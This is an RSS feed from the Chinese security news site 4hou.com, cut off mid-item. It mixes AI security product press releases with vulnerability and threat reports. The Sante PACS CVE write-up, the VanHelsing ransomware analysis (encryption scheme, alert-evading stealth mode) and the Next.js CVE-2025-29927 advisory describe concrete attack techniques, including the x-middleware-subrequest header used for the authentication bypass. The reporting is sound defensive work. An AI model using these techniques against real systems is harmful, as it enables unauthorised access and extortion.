CINXE.COM

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"> <channel> <title>嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com</title> <link>https://www.4hou.com</link> <description>嘶吼是一家新兴的互联网安全新媒体，为您带来不一样的互联网安全新视界。嘶吼的出现将为信息安全领域带来更有力量的声音，我们的每一声嘶吼，都如雷贯耳；每一个步伐，都掷地有声！</description> <item> <title><![CDATA[360亮相Black Hat Asia 2025：以大模型赋能威胁检测和防御评估]]></title> <link><![CDATA[https://www.4hou.com/posts/gyPk]]></link> <description><![CDATA[<p>近日，Black Hat Asia 2025（亚洲黑帽大会）在新加坡举办。作为网络安全行业久负盛名的系列活动，Black hat聚焦先进安全研究、发展和趋势，以其强技术性、权威性和客观性引领未来安全思想和技术走向。360数字安全集团专家受邀以《大语言模型在提取可操作的TTP攻击链中发挥的关键作用》为题发表演讲，深入分享了360基于大模型在TTP攻击链的提炼、检测和评估方面取得的突破性进展。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250407/1744014760737556.png" title="1744014760737556.png" alt="图片1.png"/></p><p>当前，大模型技术加速渗透至各行各业。在安全领域，大模型以其强大的分析和理解能力极大提高了安全运营的处理效率和精度。随着安全防御体系向主动和动态演进，如何及时捕获可模拟和执行TTP（Tactics, Techniques, and Procedures，即技术、战术和过程）知识变得至关重要。这一过程极其耗时费力，大模型具有一定优势，但还不能准确提取TTP攻击链，需进一步改进。<br/></p><p>360安全专家提出了一种高效实用的方法，通过将大模型与其他技术进行创新组合，利用多种途径为大模型提供上下文支持，克服了提取TTP攻击链的幻觉问题的同时，将其转化为可执行格式，以实现对TTP攻击链知识的快速捕获和转换利用。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250407/1744014772375099.png" title="1744014772375099.png" alt="图片2.png"/></p><p>360安全专家在演讲中阐述到，360将小模型预测的TTP结果与现有知识图谱中相似的TTP数据作为安全大模型的上下文输入，让安全大模型进行验证和思考，并基于知识图谱的推理能力进行补充，最终将TTP攻击链转化成可执行的结果，以实现对TTP攻击链知识的高效、精准、自动转化。目前，在这套方法的加持下，360安全大模型在威胁检测和评估的能力提升30%，进一步优化了安全策略效果，并在安全运营、效能评估等场景落地应用。<br/></p><p><strong>· 在安全运营领域</strong>，360通过安全大模型与本地安全大脑相结合，将优质平台与顶尖大模型深度融合，整合独家安全工具、高价值安全知识，融入智能体框架，重塑告警研判、攻击溯源、响应处置等流程，体系化提升客户的全局态势感知和主动防御能力，驱动广大政企单位智能化升级。</p><p><strong>· 在效能评估领域</strong>，360将安全大模型赋能BAS产品，以实战化、自动化、常态化的自评估机制，构建高质量、高还原度的攻击场景和攻击模拟“真题”，为企业机构提供持续性的防御态势评估，度量整体防御效能和差距，同时提供针对性的改进建议，帮助客户实现安全防御能力的持续提升与闭环。</p><p>本次亮相Black Hat Asia，是行业对360安全大模型创新能力和技术实力的认可。目前，360安全大模型已经加持360全线安全产品，并在政府、金融、央企、运营商、教育、医疗等关键基础设施行业落地使用。未来，360将持续开展安全大模型的赋能升级工作，持续打造安全新质生产力。</p>]]></description> <pubDate>Mon, 07 Apr 2025 16:34:47 +0800</pubDate> <author>企业资讯</author> </item> <item> <title><![CDATA[AI伪造邮件防不胜防？看CACTER大模型邮件安全网关如何强势破局！]]></title> <link><![CDATA[https://www.4hou.com/posts/6MjR]]></link> <description><![CDATA[<p>当下，以DeepSeek为代表的大模型应用正成为各个领域创新的”加速器“，但同时也给邮件安全领域埋下了新的隐患。恶意攻击者利用AI技术批量生成高度仿真的钓鱼邮件和变体病毒，使传统基于规则库的邮件防御体系面临失效风险，企业信息安全正遭遇智能化攻击的威胁。</p><p>据《2024中国企业邮箱安全性报告》显示，2024年，全国企业邮箱用户共收到各类钓鱼邮件约755.0亿封，相比2023年增加了30.8%。<strong>生成式AI已成为各类恶意邮件的重要生产者之一</strong>。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250407/1743994688236407.jpg" title="1743994632805600.jpg" alt="2.jpg"/></p><p><span style="font-size: 20px;"><strong>AI技术重构邮件攻防格局</strong></span><br/></p><p>如今，每分钟都有数万封 AI 生成的恶意邮件涌入网络，邮件安全攻防博持续升级，主要体现在以下几个方面：</p><p><strong><span style="font-size: 18px;">攻击者手段的三重升级</span></strong></p><p>1. 自动化升级：攻击者利用AI大模型能够定制自动化攻击脚本，实现从目标分析到钓鱼内容生成的闭环作业，精准模仿企业邮件特征</p><p>2. 伪装升级：自然语言生成(NLG)技术伪造合规邮件语义，结合多态混淆技术绕过传统检测。</p><p>3. 策略升级：AI批量生成高度仿真的钓鱼内容（文本/图片/附件），动态“升级”</p><p><strong><span style="font-size: 18px;">动态威胁&防守者的两重困境</span></strong>：</p><p>1. 传统规则的滞后性：AI加持下，攻击者更加轻易绕开规则和特征的拦截</p><p>2. 小模型拦截需要时间以及样本训练：反垃圾小模型拦截需要时间和样本学习</p><p><span style="font-size: 20px;"><strong>四大AI底层能力，以AI之盾应对AI之矛</strong></span></p><p>2025 年，面对AI 邮件攻击来势汹汹，CACTER 依托大模型 AI 能力，融合成熟的邮件安全防护体系，正式推出了<strong>新一代 CACTER 大模型邮件安全网关</strong>：</p><p>1. 语言义深度理解能力：基于Transformer架构的上下文建模</p><p>2. 多模态联合分析能力：跨文本/图像/附件的统一表征学习</p><p>3. 零样本威胁检测能力：大模型的泛化推理能力</p><p>4. 攻击者画像构建能力：社交网络辅助的关联分析</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250407/1743994689190557.jpg" title="1743994640126107.jpg" alt="1.jpg"/></p><p><span style="font-size: 20px;"><strong>三大关键功能模块，护航企业邮件安全</strong></span></p><p>CACTER大模型邮件安全网关依托AI深度防御体系，精准拦截新型高级恶意威胁邮件，首创高管专属防护方案，通过多重检测机制，保护企业邮件安全：</p><p><strong><span style="font-size: 18px;">·高管保护</span></strong></p><p>企业核心人员作为关键决策者，掌握着大量重要信息，是AI “定制化” 定向攻击的目标。</p><p>CACTER大模型邮件安全网关凭借强大的检测能力，<strong>能及时拦截针对高管的钓鱼邮件、恶意软件传播邮件以及商业机密窃取邮件</strong>：</p><p>1. 混淆文本类恶意邮件检测；</p><p>2. 罕见恶意后缀附件检测；</p><p>3. 基于语义意图理解能力：</p><p>4. 从垃圾邮件中二次识别新型高级恶意威胁；</p><p>5. 提升外语（小语种）恶意邮件检出率。</p><p><strong><span style="font-size: 18px;">·大模型 URL 沙箱</span></strong><br/></p><p>AI 赋能的动态防御体系，可通过意图级行为追踪和多模态分析验证，有效识破钓鱼链接的伪装，<strong>大幅提升新型恶意 URL 的检出率</strong>，让钓鱼链接无处藏身：</p><p>1. 意图级解析；</p><p>2. 行为链追踪；</p><p>3. 多模态分析验证；</p><p>4. 提升对新型恶意URL检出率。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250407/1743994691193680.png" title="1743994651209243.png" alt="3.png"/></p><p><strong><span style="font-size: 18px;">·AI 智能报告</span></strong><br/></p><p>支持AI数据分析，<strong>“自定义制作统计报告”和“定时推送统计报告”场景</strong>，深度解析邮件恶意数据，提出邮件防控策略：</p><p>1、邮件过滤数据深度挖掘和可视化解读；</p><p>2、智能生成邮件安全防护策略。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250407/1743994741454399.png" title="1743994741454399.png" alt="4.png"/></p><p>AI 恶意攻击与安全防御激烈博弈，形势瞬息万变，邮件安全作为企业信息防护的重要一环，其面临的风险不容轻视。<br/></p><p>CACTER始终坚信邮件安全是企业安全的基石，未来，将致力于深耕AI安全技术，以创新驱动防御进化，助力企业应对未来更复杂的网络安全挑战。</p>]]></description> <pubDate>Mon, 07 Apr 2025 14:31:13 +0800</pubDate> <author>Coremail邮件安全</author> </item> <item> <title><![CDATA[可信华泰战略转型深度布局可信AI领域]]></title> <link><![CDATA[https://www.4hou.com/posts/7Mk1]]></link> <description><![CDATA[<p>北京可信华泰信息技术有限公司（以下简称“可信华泰”）近日宣布启动战略升级，将于近期推出基于AI大模型的全新产品与解决方案。此次转型标志着这家深耕网络安全领域十余年的技术企业正式进军可信AI赛道。</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250407/1744004468149621.png" title="1744004468149621.png" alt="图片 1.png"/></p><p>作为中国电子信息产业集团（CEC）的战略参股企业，可信华泰自2012年成立以来，始终专注于可信计算3.0技术体系的研发与应用。其自主研发的“白细胞”计算机免疫平台等核心产品，成功破解了关键信息基础设施的高等级安全防护难题，目前已在党政军机关及重点行业的信息系统中实现规模化部署，成为国家网络安全等级保护2.0标准的重要技术支撑单位。</p><p>在国产化信息系统加速落地的产业背景下，可信华泰近年来保持高速发展态势：军工领域完成5个型号产品研发，累计部署量达几十万套；联合国内头部IT企业构建运维生态体系，其配置管理软件已覆盖大范围国产化市场。特别在移动端安全领域，该公司已形成独特的技术优势。</p><p>面对AI大模型引发的网络安全产业变革，这家长期深耕可信计算领域的技术企业正开启双重战略布局。据公司负责人介绍，一方面将深化可信计算3.0技术在垂直行业的应用拓展，另一方面将融合AI技术创新安全解决方案。“我们既要做强传统优势业务，更要把握AI浪潮下的新增量市场。“</p><p>公司分析指出，DeepSeek等开源模型有效降低了私有化部署门槛，推动智能化进程加速。随着各行业AI应用场景的爆发式增长，新型安全需求持续涌现。对此，可信华泰确立两大突破方向：一是基于行业知识库开发专用AI模型，二是创新研发“AI安全可信套装”，将可信计算技术与AI系统深度融合。</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250407/1744004494154080.png" title="1744004494154080.png" alt="图片 2.png"/></p><p>据悉，该公司已组建专项团队推进数据治理、知识库构建、智能体开发等工作。首款面向国产化信息系统的运维专家大模型已完成研发，同时<span style="color: rgb(255, 0, 0);"><strong>“DeepSeek安全可信一体机”</strong></span>业已面世。该方案依托可信计算3.0技术架构，通过TPCM（可信平台控制模块）实现硬件级安全防护，可提供超越系统权限的安全度量与监控能力。</p><p>值得关注的是，该解决方案支持用户采用自主密钥管理体系，支持核心密钥的全流程替换，确保用户对数据和系统的完全掌控。据可靠消息，相关产品将于4月中旬正式<strong><span style="color: rgb(255, 0, 0);">商用</span></strong>发布，届时将详细披露<span style="color: rgb(255, 0, 0);"><strong>“国产化信息系统运维专家大模型”</strong></span>与<strong><span style="color: rgb(255, 0, 0);">“DeepSeek安全可信一体机”</span></strong>的技术参数及商业应用场景。</p>]]></description> <pubDate>Mon, 07 Apr 2025 13:42:39 +0800</pubDate> <author>企业资讯</author> </item> <item> <title><![CDATA[Sante PACS 服务器漏洞可使远程攻击者下载任意文件]]></title> <link><![CDATA[https://www.4hou.com/posts/vwz5]]></link> <description><![CDATA[<p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250325/1742892579131198.jpg" title="1742892151110978.jpg" alt="google(20)-1.jpg"/></p><p>最近，在 Sante PACS Server 4.1.0 版本中发现了几个严重漏洞，这使得该版本极易遭受严重的安全威胁。</p><p>这些漏洞（CVE - 2025 - 2263、CVE - 2025 - 2264、CVE - 2025 - 2265 和 CVE - 2025 - 2284）会让服务器面临潜在攻击风险，可能引发未经授权的访问、数据泄露以及拒绝服务（DoS）等情况。</p><p>在本文中，我们将深入剖析每个漏洞，给出受影响代码的示例及漏洞摘要。</p><p><span style="font-size: 20px;"><strong>漏洞概述</strong></span></p><p><strong><span style="font-size: 18px;">CVE - 2025 - 2263：EVP_DecryptUpdate 基于堆栈的缓冲区溢出</span></strong></p><p>该漏洞源于 Sante PACS 服务器在使用 OpenSSL 的 EVP_DecryptUpdate 时，出现基于堆栈的缓冲区溢出问题。在用户登录服务器的过程中，服务器使用固定大小为 0x80 字节的堆栈缓冲区来解密用户名和密码。攻击者可以通过发送超长的加密用户名或密码来利用此漏洞，进而引发缓冲区溢出，甚至可能实现代码执行。</p><p>有漏洞的代码：</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250325/1742892580131368.png" title="1742892355529998.png" alt="image.png"/></p><p><strong><span style="font-size: 18px;">CVE - 2025 - 2264：路径遍历信息泄露</span></strong></p><p>此漏洞使得未经身份验证的远程攻击者能够下载服务器磁盘上的任意文件。嵌入式 Web 服务器负责提供特定目录中的文件，但它未能对请求路径进行正确验证，从而引发路径遍历攻击。攻击者可以构造一个超出预期目录结构的 URL 来利用该漏洞。</p><p>利用示例：</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250325/1742892580121567.png" title="1742892425191659.png" alt="image.png"/></p><p><strong><span style="font-size: 18px;">CVE - 2025 - 2265：HTTP.db SHA1 哈希截断</span></strong></p><p>在此漏洞中，如果存储在服务器的 SQLite 数据库中的密码哈希值包含零字节，那么该哈希值将会被截断，这就使得它容易遭受碰撞攻击。攻击者可以利用路径遍历漏洞先下载数据库，然后找到与截断哈希值等效的密码。</p><p>易受攻击的哈希处理代码：</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250325/1742892581129765.png" title="1742892508113322.png" alt="image.png"/></p><p><strong><span style="font-size: 18px;">CVE - 2025 - 2284：访问未初始化指针 DoS</span></strong></p><p>当服务器尝试从格式错误的请求中提取登录凭据时，就会出现这个拒绝服务漏洞。如果 “usrname” 字段后面没有足够的行，服务器可能会访问未初始化的指针，进而导致崩溃。</p><p>格式错误的请求 PoC：</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250325/1742892582161096.png" title="1742892548120535.png" alt="image.png"/></p><p><span style="font-size: 20px;"><strong>漏洞摘要</strong></span></p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250325/1742892578829937.png" title="1742892578829937.png" alt="image.png"/></p><p>为了防范这些漏洞，建议用户将 Sante PACS 服务器升级到 4.2.0 或更高版本。根据 Tenable 的报告，此次更新将修复这些安全问题，增强系统的整体安全态势。用户还应考虑采取额外的安全措施，如网络分段和定期监控，以便检测潜在的攻击尝试。</p><p>与任何软件漏洞情况一样，及时采取行动对于确保敏感数据的完整性和系统可用性至关重要。定期更新和安全审计是维护强大网络安全防御体系的基本操作。</p>]]></description> <pubDate>Mon, 07 Apr 2025 12:00:00 +0800</pubDate> <author>山卡拉</author> </item> <item> <title><![CDATA[IDC发布中国AI Agent应用市场概览，360五大领域入选领跑安全行业]]></title> <link><![CDATA[https://www.4hou.com/posts/5Mg8]]></link> <description><![CDATA[<p>近日，全球领先的IT市场研究和咨询公司IDC发布《IDC Market Glance: 中国AI Agent应用市场概览，1Q25》（Doc#CHC53057625，2025年3月，简称“报告”），报告提供了中国AI Agent应用市场的细分市场分类以及代表厂商，旨在全面展示中国AI Agent应用的市场格局。<a></a><a>凭借领先的大模型技术与应用实力</a>，360入选智能助理、内容创作、办公协同、生产力工具、安全等五大领域代表厂商，数量位居安全行业首位，成为引领中国大模型及Agent应用市场发展的关键力量。</p><p style="text-align: center;"> <img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743665082113362.jpg" title="1743665082113362.jpg" alt="image001.jpg"/> </p><p>IDC指出，当前，国内AI Agent市场对定义缺乏一致性，真正符合自主性、主动性、适应性特质的AI Agent产品较少，这直接导致市场产品质量良莠不齐，终端用户甄别难度增大。为此，IDC对市面上的AI Agent应用进行了梳理，从消费者端和企业端两大维度的多个方面展示了智能体的多元化应用。</p><p>360在消费者端拥有近20年的国民级互联网服务经验，并在实践中沉淀了成熟的企业级大模型和智能体解决方案。在本次报告中，360凭借360安全大模型、360纳米AI、360织语等产品在消费者端的智能助理、内容创作领域和企业端的办公协同、生产力工具、安全领域表现突出，<a></a><a>成为安全行业入选最多领域的厂商。</a>具体来说：</p><p>· 360安全大模型：360提出用AI重塑安全并推出首个AI实战应用的安全行业大模型：360安全大模型，在安全智能体方面，聚焦自动化威胁狩猎、深度分析研判、威胁攻击溯源、钓鱼邮件检测等领域进行专项训练，推出100+安全数字专家，帮助企业进行针对性安全防护能力提升，低成本、高效率地实现24小时不间断安全守护。</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743665120155312.png" title="1743665120155312.png" alt="image002.png"/></p><p>· 360纳米AI：拥有全网最大的大模型超市，集成包括DeepSeek、豆包、Kimi等国内16家大模型厂商的50多款模型；上线全网首个大模型驱动的多模态知识库，成为用户的第二大脑，永久记忆；纳米AI还是视频高手，文生图、图生视频、视频生视频，各类视频大模型随心调用，为个人用户带来全新的大模型使用体验。</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743665149122814.png" title="1743665149122814.png" alt="image003.png"/></p><p>· 360织语：立足政企智能化协作深度需求，通过得天独厚的超级入口和底座能力，以Agent开发平台为核心引擎，与业务集成、应用生成、事项协作等能力紧密结合，深度打通业务流、消息流与知识流，实现跨系统、跨部门的一体化业务协同，用AI重塑政企协作流程，让复杂工作更简单更高效。</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743665168532784.png" title="1743665168532784.png" alt="image004.png"/> </p><p>IDC强调，Al Agent将迎来规模化落地浪潮。未来，360将持续深耕大模型在各领域的落地应用，加速产业数智化升级，推动人工智能迈向新高度！</p>]]></description> <pubDate>Thu, 03 Apr 2025 15:27:15 +0800</pubDate> <author>企业资讯</author> </item> <item> <title><![CDATA[VanHelsing 勒索软件剑指 Windows、ARM 及 ESXi 系统]]></title> <link><![CDATA[https://www.4hou.com/posts/om0X]]></link> <description><![CDATA[<p>一种名为 VanHelsing 的新型多平台勒索软件即服务（RaaS）操作已经出现，其攻击目标涵盖 Windows、Linux、BSD、ARM 和 ESXi 系统。</p><p>3 月 7 日，VanHelsing首次在地下网络犯罪平台上进行推广，可使经验较多的会员免费加入，但要求经验较少的威胁者缴纳 5000 美元的押金。</p><p>CYFIRMA 在上周晚些时候首次记录了这一新的勒索软件操作，Check Point Research 则进行了更深入的分析，并于昨日发表相关报告。</p><p><span style="font-size: 20px;"><strong><span style="text-wrap-mode: wrap;">VanHelsing</span>内部运作</strong></span></p><p>Check Point 的分析师报告称，VanHelsing 是一个俄罗斯的网络犯罪项目，该项目禁止针对独联体（CIS）国家的系统进行攻击。</p><p>联盟会员能够保留 80% 的赎金，而运营商收取 20% 的佣金。付款通过自动托管系统处理，该系统采用两个区块链确认来保障安全。</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743643675197721.png" title="1742873052338034.png" alt="image.png"/></p><p style="text-align: center;">VanHelsing 广告邀请会员加入</p><p>被接受的附属机构可以访问具有完整操作自动化的面板，同时还能获得开发团队的直接支持。</p><p>从受害者网络窃取的文件直接存储在 VanHelsing 行动的服务器上。核心团队声称，他们会定期进行渗透测试，以确保系统具备一流的安全性和可靠性。</p><p>目前，暗网上的 VanHelsing 勒索门户列出了三名受害者，其中两名在美国，一名在法国。其中一个受害者是德克萨斯州的一个城市，另外两名受害者是科技公司。</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743643679813610.png" title="1742873116805807.png" alt="image.png"/></p><p style="text-align: center;">VanHelsing 勒索页面</p><p>勒索软件运营商威胁称，如果他们的财务要求得不到满足，将在未来几天泄露被盗文件。根据 Check Point 的调查，赎金金额为 50 万美元。</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743643681864849.png" title="1742873171111955.png" alt="image.png"/></p><p style="text-align: center;"><span style="text-wrap: wrap;">VanHelsing </span>的勒索信</p><p><span style="font-size: 20px;"><strong>隐身模式</strong></span></p><p>VanHelsing 勒索软件由 C++ 编写，有证据显示它于 3 月 16 日首次在实际环境中部署。</p><p>VanHelsing 使用 ChaCha20 算法进行文件加密，为每个文件生成一个 32 字节（256 位）的对称密钥和一个 12 字节的随机数。然后，使用嵌入的 Curve25519 公钥加密这些值，并将生成的加密密钥 / 随机数对存储在加密文件中。</p><p>VanHelsing 对大于 1GB 的文件进行部分加密，但对较小的文件则运行完整的加密过程。</p><p>该恶意软件支持丰富的 CLI 定制，以便针对每个受害者定制攻击。例如，可以针对特定驱动器和文件夹、限制加密范围、通过 SMB 传播、跳过卷影副本删除，以及启用两相隐身模式。</p><p>在正常加密模式下，VanHelsing 会枚举文件和文件夹，加密文件内容，并重命名生成的文件，附加 “.vanhelsing” 扩展名。</p><p>在隐身模式下，勒索软件将加密与文件重命名分离。由于文件 I/O 模式模仿正常系统行为，因此不太可能触发警报。即使安全工具在重命名阶段开始时做出反应，在第二遍操作时，整个目标数据集也已经被加密了。</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743643682622421.png" title="1742873227708009.png" alt="image.png"/></p><p style="text-align: center;">隐形加密功能</p><p>尽管 VanHelsing 看起来很先进且发展迅速，但 Check Point 注意到了一些代码不成熟的问题。其中包括文件扩展名不匹配、可能触发双重加密的排除列表逻辑错误，以及几个未实现的命令行标志。尽管存在这些错误，VanHelsing 仍然是一个令人担忧且不断上升的威胁，正在逐渐受到更多关注。</p>]]></description> <pubDate>Thu, 03 Apr 2025 12:00:00 +0800</pubDate> <author>山卡拉</author> </item> <item> <title><![CDATA[漏洞预警 | Next.js 中间件鉴权绕过漏洞 (CVE-2025-29927)]]></title> <link><![CDATA[https://www.4hou.com/posts/LG2r]]></link> <description><![CDATA[<p><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">1、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">漏洞概述</strong></p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743648711796257.png" title="1743648711796257.png" alt="image.png"/></p><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">近日，vercel发布更新修复Next.js中间件鉴权绕过漏洞（CVE-2025-29927），建议您及时开展安全风险自查。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">据描述，由于 next.js应用程序使用中间件时，其函数调用 runMiddleware 会识别x-middle-subrequest请求头，用以识别是否应用了中间件，如果其值是中间所在路径，则可以完全绕过鉴权。攻击者可以利用该漏洞获取服务器敏感信息。如果站点具有缓存/CDN 系统，则可能会强制缓存 404 响应，从而使其页面不可用，严重影响其可用性。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">漏洞影响的产品和版本：</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">11.1.4 <= next.js <= 13.5.6  </p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">14.0.0 <= next.js <= 14.2.24  </p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">15.0.0 <= next.js <= 15.2.2</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p></section><section><section><section><section><section><section><section><section><section></section><section></section><section></section></section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">2、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">漏洞复现</strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important; text-align: center;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743648712208225.png" title="1743390836122007.png" alt="QQ20250331-110445.png"/></strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"></strong></p><section><section><section><section><section><section><section><section><section></section><section></section></section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">3、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">资产测绘</strong></p></section></section></section></section></section></section></section></section><p></p><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;">据daydaymap数据显示互联网存在2,864,117个资产，国内风险资产分布情况如下：</p></section><p></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important; text-align: center;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743648713265114.png" title="1743390854497361.png" alt="QQ20250331-110514.png"/></strong><br/></p></section></section></section></section></section></section></section></section></section><p></p><p><br/></p><section><section><section><section><section><section><section><section><section></section><section></section></section></section></section></section><section><section><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><strong style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important">4、解决方案</strong></p><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><strong style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></strong></p></section></section></section></section></section></section><p></p><section><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><strong style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important">临时缓解方案：</strong></p><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important">部署针对项目的监控系统：阻止包含 x-middleware-subrequest 标头的外部用户请求到达您的 Next.js 应用程序。</p><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 